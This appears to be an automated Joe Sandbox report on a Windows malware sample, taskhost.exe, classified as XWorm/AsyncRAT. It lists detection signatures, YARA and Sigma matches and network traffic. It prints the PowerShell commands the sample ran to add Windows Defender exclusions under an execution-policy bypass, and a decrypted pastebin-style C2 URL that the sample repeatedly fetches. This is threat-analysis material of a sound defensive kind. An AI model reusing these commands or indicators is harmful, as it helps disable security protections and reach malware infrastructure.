Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
taskhost.exe

Overview

General Information

Sample name:taskhost.exe
Analysis ID:1574512
MD5:3296704171fe01c0fc4fcdd02f2695ca
SHA1:e0bd82f06d94c0e32d7f6bb9f80f57f8e73a84be
SHA256:b8c65f4588d2d9b76823e7ad22b71a3717792a505a4048314cb2ccba9a976e26
Tags:AsyncRATexeStealCuser-lontze7
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • taskhost.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\taskhost.exe" MD5: 3296704171FE01C0FC4FCDD02F2695CA)
    • powershell.exe (PID: 7456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
taskhost.exeJoeSecurity_XWormYara detected XWormJoe Security
    taskhost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      taskhost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xb9bc:$s6: VirtualBox
      • 0xb91a:$s8: Win32_ComputerSystem
      • 0xdb0a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xdba7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xdcbc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xcc34:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1261092658.0000000000B02000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1261092658.0000000000B02000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xb7bc:$s6: VirtualBox
        • 0xb71a:$s8: Win32_ComputerSystem
        • 0xd90a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xd9a7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xdabc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xca34:$cnc4: POST / HTTP/1.1
        Process Memory Space: taskhost.exe PID: 6504JoeSecurity_XWormYara detected XWormJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.taskhost.exe.b00000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.0.taskhost.exe.b00000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              0.0.taskhost.exe.b00000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xb9bc:$s6: VirtualBox
              • 0xb91a:$s8: Win32_ComputerSystem
              • 0xdb0a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xdba7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xdcbc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xcc34:$cnc4: POST / HTTP/1.1

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\taskhost.exe", ParentImage: C:\Users\user\Desktop\taskhost.exe, ParentProcessId: 6504, ParentProcessName: taskhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', ProcessId: 7456, ProcessName: powershell.exe
              Sigma detected: System File Execution Location Anomaly
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\Desktop\taskhost.exe", CommandLine: "C:\Users\user\Desktop\taskhost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\taskhost.exe, NewProcessName: C:\Users\user\Desktop\taskhost.exe, OriginalFileName: C:\Users\user\Desktop\taskhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\Desktop\taskhost.exe", ProcessId: 6504, ProcessName: taskhost.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\taskhost.exe", ParentImage: C:\Users\user\Desktop\taskhost.exe, ParentProcessId: 6504, ParentProcessName: taskhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', ProcessId: 7456, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\taskhost.exe", ParentImage: C:\Users\user\Desktop\taskhost.exe, ParentProcessId: 6504, ParentProcessName: taskhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', ProcessId: 7456, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\taskhost.exe", ParentImage: C:\Users\user\Desktop\taskhost.exe, ParentProcessId: 6504, ParentProcessName: taskhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe', ProcessId: 7456, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\taskhost.exe", CommandLine: "C:\Users\user\Desktop\taskhost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\taskhost.exe, NewProcessName: C:\Users\user\Desktop\taskhost.exe, OriginalFileName: C:\Users\user\Desktop\taskhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\Desktop\taskhost.exe", ProcessId: 6504, ProcessName: taskhost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-13T11:50:02.449310+010028033053Unknown Traffic192.168.2.749914104.26.2.16443TCP
              2024-12-13T11:50:11.197865+010028033053Unknown Traffic192.168.2.749937104.26.2.16443TCP
              2024-12-13T11:50:15.492597+010028033053Unknown Traffic192.168.2.749943104.26.2.16443TCP
              2024-12-13T11:50:26.711757+010028033053Unknown Traffic192.168.2.749976104.26.2.16443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: taskhost.exeAvira: detected
              Multi AV Scanner detection for submitted file
              Source: taskhost.exeReversingLabs: Detection: 78%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: taskhost.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: taskhost.exeString decryptor: https://rentry.co/ue6sxoup/raw
              Source: taskhost.exeString decryptor: C^}'$Nv6G!-4Aq);8z8?
              Source: taskhost.exeString decryptor: <Xwormmm>
              Source: taskhost.exeString decryptor: USB.exe
              Source: taskhost.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.7:49762 version: TLS 1.2
              Source: taskhost.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Connects to a pastebin service (likely for C&C)
              Source: unknownDNS query: name: rentry.co
              Yara detected Generic Downloader
              Source: Yara matchFile source: taskhost.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.taskhost.exe.b00000.0.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: ip-api.com
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49914 -> 104.26.2.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49943 -> 104.26.2.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49937 -> 104.26.2.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49976 -> 104.26.2.16:443
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ue6sxoup/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: rentry.co
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yJCzXQ3zkby6SjutzzLQIApXZWRP%2FCa6jcqFt0V5MnWYnRIo5UxaE7UMm%2BaqWe%2Ft1j7p20ZbQ8bwdUze3xLibvlTPoxcwq%2BeYrEqUfNWCHX0f5gSV%2BwxE4C9NA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1562988ccec356-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1678&rtt_var=634&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1717647&cwnd=153&unsent_bytes=0&cid=23b471d515436138&ts=1094&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nqh2ifxraV2eHphC0rz5C0RqucWc9os%2BdLQOeG2y8rdHr9520zOcF1Cduo4SU4LgkZ7CCuF%2BMP6obT5hh5IKslKipym7ZERLDu5%2Fpa2T3HlHkqaSzU520Khhmg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1562b7ffda1a44-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1881&min_rtt=1881&rtt_var=706&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1549071&cwnd=128&unsent_bytes=0&cid=adc4055d90e59e5e&ts=797&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vo7ztOkbDbrDmzeIPyI2muJ7avP4mI6zI5SZHkc1eA%2BLUAUNVnNwYDRchMJpt6P4ZwT3xqzEsUrJnMnu8fU9KSjsesMwrJzoJCNfUQ3DZuBgWN3vExUqou%2Bxkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1562d768326a52-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1632&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1780487&cwnd=210&unsent_bytes=0&cid=acb32cf043ec59ec&ts=811&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HMG3ssmp6qYTSfPiMSHGdthhNruBVPNsVGcx7b5P9OHr%2FYiVvmpSv7DmFzXHC2CF60VhqKZwtPovKc2s2qSJUg7KQE2zJT7nrdNOQccZKHTFG17pUHlxVlNkkA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1562f75c00c3f3-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1521&rtt_var=580&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2816&recv_bytes=685&delivery_rate=1869398&cwnd=190&unsent_bytes=0&cid=71ce6182055a44e3&ts=813&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUzhzd%2FP4pDZoXakiJ6cZfmuf3jSbFkHrC%2FgxvkAipp3s7vWgXlqykUGgj7xn86yUgFqdKgLpT%2BNT9jqSc%2BG1VcPl0gODuu2N%2FmqBdtkj3dpk0Y0okX3b7mitQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f156316cf738cb4-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2007&rtt_var=762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1426477&cwnd=189&unsent_bytes=0&cid=9bf5b7b002d032e7&ts=823&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1wKiZChZkdQPNl4JotC2VIEVHZChdO3yu%2BWcrHMhc14bx8KLileVosDtbTPDVU9aPVxlI4bK8J%2BPBvyqcHLWfuFRpbibjBT%2B1c%2Fz7qq6aOLBogi3rPmliWPLSQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1563364ddb41d2-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1612&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1801357&cwnd=251&unsent_bytes=0&cid=8269f3d10fcaaf1b&ts=797&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjMi5qQhrnRArk4%2Bjapr95QF3tFFeNTTNJ3rQ4SuDhFR77xBl7%2B7DxZeHGZZicQCBVLkG%2FJ9LFLs%2FU5Sty0q%2B079RZqMIXW5%2FJQRtiY5gg8auxEg7vTlVCaNHA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f156355ab91c331-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1649&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1770770&cwnd=79&unsent_bytes=0&cid=3b8c0c32577c3098&ts=806&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aWp5dp5s8Mg0j9oQd9rdFOwJwTVlP4LF%2By1SbFmsCuMWQOIuHtdKL7%2FD8EmmRdFkgxNeBL4kXPCt82lP%2Fzm56VCSGdt%2B2HzouN1co4fWIi1%2FaTBfQTmSOKfruQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1563750906de9a-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1513&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1921052&cwnd=209&unsent_bytes=0&cid=30b89b07403da010&ts=811&x=0"
